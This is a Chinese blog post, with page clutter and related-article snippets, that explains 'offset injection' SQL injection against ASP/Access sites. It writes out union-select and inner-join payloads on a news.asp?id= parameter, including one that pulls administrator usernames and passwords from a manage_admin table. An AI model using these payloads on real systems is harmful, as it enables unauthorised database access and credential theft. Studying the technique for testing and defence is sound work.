access 偏移注入 案例

最新推荐文章于 2023-03-24 18:06:54 发布
最新推荐文章于 2023-03-24 18:06:54 发布
阅读量1.2k 收藏
点赞数
分类专栏: web hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eT48_sec/article/details/44263181
版权 

news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id

看个案例就明白是什么意思了

先是背景

news.asp?id=3306 存在注入

然后通过 order by 可知查询返回 12 列

通过数据表字典跑出管理员表 manage_admin,但是无论如何也跑不出字段名

好,背景介绍完毕


接下来通过 order by 查询manage_admin 一共有多少字段

4返回正常,5返回错误,所以manage_admin 一共有4个字段。

2x4<12 当然等于也可以。

news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id


案例讲完了,来分析一下sql语法,看下图w3school的解释。

as 关键字则是为数据表取别名。

最后利用 union 联合查询获取数据。

这也是偏移注入的原理,可在不知道字段名的情况下查询数据。

ps:这是彩笔的理解,不一定正确。


另外,关于猜解管理员表字段名这里有个技巧,一般与通过后台登录表单的输入框名称同名,本案例中就是这样。

news.asp?id=3039 and 5>9 UNION SELECT 1,userpassword,3,4,5,6,admin,8,9,10,11,12 from manage_admin


纳尼,这就是偏移注入,其实偏移注入也可以用来猜解数据表一共有多少字段。


news.asp?id=3039 and 4>8 union select 1,2,3,4,5,6,7,8,* from manage_admin //返回正常
<pre name="code" class="plain">news.asp?id=3039 and 4>8 union select 1,2,3,4,5,6,7,8,9,* from manage_admin //返回错误

 

 说明表manage_admin 有4个字段(12-8) 

 
 

 


 

                

        

        

    




    

      

        

            

              
                
                  eT48_Sec
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
【漏洞扫描】——14、AWVS工程扫描

				
			

			

				

					Fly_鹏程万里
				

				

					03-01
					
					2035
					
				

			

		

		

			
				
本篇文章我们主要介绍AWVS如何对目标网站进行扫描以及如何导出扫描报告。

			
		

	



                

              
                



	

		

			

				
					
从数据库说偏移注入原理

				
			

			

				

					Do的博客
				

				

					11-16
					
					518
					
				

			

		

		

			
				
从数据库说偏移注入原理
场景
在常见的SQL注入当中,一般是将数据库中的表名、列名猜解出来之后,然后通过查询的方式获取具体的数据值。如SqlMap就是采用这样的注入流程进行数据获取的。但是这样的方式存在一个问题就是当知道数据表的名字,但是列名很长,或者数据库系统比较简单,不能通过查询系统数据库中的信息获取到用户表中的表名时就很难获取到想要的数据信息,如access数据库。(比如其中SQL Server 和MySQL都可以通过查询系统数据库获取到具体的列名)

原理
简单来说偏移注入的原理就是通过连接查询方式

			
		

	



                


  
              

                


	

		

			

				
					
SQL注入-针对asp+access网站进行SQL注入

				
			

			

				

					qq_25899635的博客
				

				

					05-23
					
					4957
					
				

			

		

		

			
				
asp+access网站技术介绍
  ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...

			
		

	





	

		

			

				
					
Access数据库--偏移注入

				
			

			

				

					Y22Lee的博客
				

				

					03-24
					
					226
					
				

			

		

		

			
				
由于我的学习进度到了偏移注入,所以在网上也查找相关资料来查漏补缺填补我的不足,但是我发现我与网上的博主注入思路相差不大,区别在于他们大都使用了SQL 内连接函数 inner join帮助输出结果,下面是我的方法!对于Access数据库我上一篇的Access–cookie注入已经介绍过,偏移注入与cookie注入的方法和使用的函数部分相同。但是偏移注入的使用场景比它更加特殊偏移注入只需要爆破出任一表名,不需要知道任意字段名即可完成注入。a.偏移注入不只是针对Access数据库。

			
		

	



		

			
		



	

		

			

				
					
Access数据库注入偏移注入

				
			

			

				

					seek_2022的博客
				

				

					05-02
					
					2512
					
				

			

		

		

			
				
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag

一、偏移注入使用场景
在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。
当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工

			
		

	





	

		

			

				
					
渗透测试基础-Access数据库之偏移注入

				
			

			

				

					weixin_45488495的博客
				

				

					04-12
					
					413
					
				

			

		

		

			
				
渗透测试基础-Access数据库之偏移注入偏移注入漏洞总结
只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????!
偏移注入
偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。
先来了解一些数据库小知识
select * from school
代表的是查询school表里面的所有数据(如图)

但其实我们可以换其他的写法,来达到相同的查询效果
select school.* from school

所以咱们这里的

			
		

	





	

		

			

				
					
Access偏移注入利用-01

				
			

			

				

					09-15
				

			

		

		

			
				
Access偏移注入利用-01

			
		

	





	

		

			

				
					
Access偏移注入

				
			

			

				

					10-02
				

			

		

		

			
				
### Access偏移注入详解  #### 一、Access偏移注入概念与原理  Access偏移注入是一种针对Microsoft Access数据库的特殊SQL注入技术。这种技术利用了Access数据库在处理SQL语句时的一些特性,允许攻击者通过构造特殊...

			
		

	





	

		

			

				
					
access 经典案例

				
			

			

				

					04-09
				

			

		

		

			
				
在本“Access经典案例”中,我们将会深入探讨几个关键的应用场景,包括图书管理系统、教学管理系统、进销存管理系统以及财务管理系统,这些都是企业或组织日常运营中常见的数据管理需求。  首先,图书管理系统是一个...

			
		

	





	

		

			

				
					
access偏移-sql.rar

				
			

			

				

					02-19
				

			

		

		

			
				
cracer教程培训,access数据库偏移注入网站源码,直接使用IIS搭建网站,放在wwwroot路径下即可

			
		

	





	

		

			

				
					
整理比较全的Access SQL注入参考

				
			

			

				

					09-14
				

			

		

		

			
				
Access SQL 注入案例  1. 获取数据库版本:使用 UNION SELECT 语句来获取 Access 数据库的版本信息。 2. 获取表名:使用 UNION SELECT 语句来获取 Access 数据库中的表名。 3. 获取列名:使用 UNION SELECT 语句来...

			
		

	





	

		

			

				
					
sql防注入通用程序sqlin

				
			

			

				

					06-20
				

			

		

		

			
				
sql防注入通用程序源码,研究sql防注入从而攻击

			
		

	





	

		

			

				
					
16、注入篇--偏移注入Access

				
			

			

				

					WX公众号-小白学安全
				

				

					04-10
					
					442
					
				

			

		

		

			
				
偏移注入也称移位溢出
使用场景
知道表名,不知道字段名
注入点的字段数要大于需要查询的表名字段数

注入流程

order by   判断字段数
猜测表名 and exists(select * from 表名)
开始偏移注入

注意:
select username,password from admin
===>select * from admin
===>select admin.* from admin
库名.表名.字段名
靶场
1、进入靶场,观察ID进行了传递参数,探测id是否可以注

			
		

	





	

		

			

				
					
Access偏移注入与原理

				
			

			

				

					m0_56750177的博客
				

				

					04-09
					
					399
					
				

			

		

		

			
				
Access偏移注入:表名知道,列名无法获取的情况下。



1、判断注入点


127.0.0.1/asp/index.asp?id=1513 and 1=1 正常
127.0.0.1/asp/index.asp?id=1513 and 1=2 错误



2、查询字段个数


127.0.0.1/asp/index.asp?id=1513 order by 22 正常
127.0.0.1/asp/index.asp?id=1513 order by 23 错误



3、爆出显位


127.0.0.1

			
		

	





	

		

			

				
					
access偏移注入

				
			

			

				

					baynk的博客
				

				

					06-07
					
					2997
					
				

			

		

		

			
				
记录总结偏移注入的使用方法。

为什么要用偏移注入
偏移注入access比较独有的一种注入手段,很有特点(人品。。)的注入方式,一般用于在猜出了表名但是没有猜出列名的情况下使用。

偏移注入的使用
目前猜测出了表名,但是怎么都猜不出列名,使用联合查询法来进行偏移注入。

接下来测出偏移量,其实这个偏移量就是admin这张表的列的个数。直接将22改成*号,测试是否回显正常,不正常就一直往前减,一...

			
		

	





	

		

			

				
					
access偏移注入原理

				
			

			

				

					m0_56069948的博客
				

				

					01-17
					
					546
					
				

			

		

		

			
				
Python微信订餐小程序课程视频
https://edu.csdn.net/course/detail/36074
Python实战量化交易理财系统
https://edu.csdn.net/course/detail/35475

前言:近段时间在学习access偏移注入时,在网上查询了大量的资料,感觉很多资料讲解的十分模糊并且我个人认为有很多不够严谨的地方,于是我便在线下经过大量测试,写出以下文章,如有错误,望指出。
如要转载,请标明出处!!

一、认识偏移注入

偏移注入的适用背景:

access

			
		

	





	

		

			

				
					
ACCESS数据库偏移注入

				
			

			

				

					qq_39756628的博客
				

				

					05-01
					
					236
					
				

			

		

		

			
				
access数据库简介
access 关系型数据库,同时 也是文件型数据库,不需要端口号。
结构上与其他关系型数据库不同,只有表名、列名、字段名, 没有数据库名, 自己网站自己管,数据库*.mdb直接在自己网站目录下面,同时它也没有一些相关函数,如文件读写等,目前用的已经不多了。
注入偏移步骤
判断列数=》22


联合查询

逐个向前迁移判断表中字段数=》22-16=6

爆破字段内容:
一级偏移注入22-6×2=10
UNION SELECT 1,2,3,4,5,6,7,8,9,10,*from (ad

			
		

	





	

		

			

				
					
SQL注入偏移注入Access

				
			

			

				

					秋水的博客
				

				

					09-02
					
					5098
					
				

			

		

		

			
				
注入简介

什么是偏移注入偏移注入是一种注入姿势,可以根据一个较多字段的表对一个少字段的表进行偏移注入,一般是联合查询,在页面有回显点的情况下


偏移注入使用场景


在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。

当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。

像Sqlmap之类的工具实际上是爆破...

			
		

	





	

		

			

				
					
access sql注入

					
最新发布

				
			

			

				

					09-22
				

			

		

		

			
				
在讨论Access SQL注入之前,先来了解一下什么是SQL注入。SQL注入是指攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而绕过应用程序的安全机制,执行未经授权的操作。而Access SQL注入指的是在Access数据库中进行SQL注入攻击。

Access SQL注入的原理与一般的SQL注入相似,攻击者通常会利用输入字段的漏洞,插入恶意的SQL代码,以达到获取、篡改或删除数据库信息的目的。

为了防止Access SQL注入,可以采取以下几种措施:
1. 使用参数化查询或预编译语句,这样可以防止恶意SQL代码的注入。
2. 对用户输入进行严格的验证和过滤,确保输入的数据符合预期的格式和类型。
3. 最小化数据库用户的权限,只给予他们必要的访问权限,以限制攻击者的操作范围。
4. 定期更新和维护Access数据库的安全补丁,以防止已知的安全漏洞被攻击利用。



			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值